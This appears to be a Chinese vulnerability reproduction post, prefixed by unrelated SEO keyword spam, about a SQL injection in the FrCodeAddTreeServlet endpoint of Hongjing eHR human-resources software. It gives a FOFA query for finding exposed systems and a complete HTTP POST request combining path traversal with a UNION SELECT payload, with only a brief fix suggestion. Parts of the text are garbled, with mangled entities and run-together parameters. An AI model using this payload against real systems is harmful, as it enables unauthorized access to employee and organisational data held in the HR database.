南宫职业教育中心示范校建设网站,上海住房和城乡建设部网站,个人网站建设架构,如何使用wordpress插件前言
免责声明#xff1a;请勿利用文章内的相关技术从事非法测试#xff0c;由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失#xff0c;均由使用者本人负责#xff0c;所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 一、产…前言
免责声明请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 一、产品简介
宏景eHR是一款面向国有企事业单位的人力资源管理数智化软件产品旨在帮助企业实现人力资源的数字化和智能化管理。
二、漏洞描述
该系统FrCodeAddTreeServlet接口存在SQL注入漏洞
三、影响范围
未知
四、复现环境
FOFAapp“HJSOFT-HCM”
五、漏洞复现
1.访问存在漏洞的网站抓包
2.测试payload
POST /templates/attestation/../../servlet/FrCodeAddTreeServlet HTTP/1.1
Host: IPport
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Length: 132
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencodedparamsissuperuserparentidprivTypemanagepriveactiontargetshowType1UNIONALLSELECT123,NULL,NULL,NULL,NULL,NULL--3.成功 六、修复建议
及时更新系统安装防护设备过滤请求中的敏感字符
